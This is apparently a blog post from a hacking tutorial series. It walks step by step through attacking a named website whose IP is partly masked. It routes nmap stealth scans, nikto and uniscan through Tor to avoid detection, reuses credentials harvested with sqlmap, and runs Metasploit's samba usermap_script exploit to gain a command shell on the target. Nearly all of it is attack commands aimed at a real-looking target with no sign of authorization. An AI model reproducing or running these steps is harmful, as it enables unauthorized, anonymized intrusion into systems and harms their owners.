anon@1337-817chs:~$sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105
Scan the site with nikto and uniscan + proxychains to route it over tor;
anon@1337-817chs:~$sudo proxychains nikto -h www.Jihadist.ps && proxychains nikto -h 104.28.##.105
anon@1337-817chs:~$sudo proxychains ./uniscan -u https://www.Jihadist.ps/
that will take awhile...check on your sqlmap results from chapter 1
any usernames or passwords? ooh goody...
on too metasploit!!
The following info should have been obtained with the help of the tor cloaked scanning
Target ip (from nslookup) 104.28.##.105
Target OS and Version (from nmap set to zero ping "-Pn" to avoid detection The
-Ss option tells nmap to perform a stealth scan, the -A option tells it to try to discover OS)
kick it oldschool by googling "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit.
We need to find out the OS and ports and services running on the target system.
Once you find the open ports and service like a samba port its party time.
Fire up Metasploit
anon@1337-817chs:~$msfconsole
Route it through TOR
msf >set Proxies socks5:127.0.0.1:9050
We need to find the version of samba..
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) >set RHOST 104.28.##.105
RHOST => 104.28.##.105
msfauxiliary(smb_version) >set RPORT 445
RPORT => 445
msfauxiliary(smb_version) >exploit
With version in hand, restart msfconsole now we use the appropriate module...
anon@1337-817chs:~$msfconsole
msf >set Proxies socks5:127.0.0.1:9050
msf >use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 104.28.##.105
msf exploit(usermap_script) >exploit
We now have a command shell on the target box... have fun!
No comments:
Post a Comment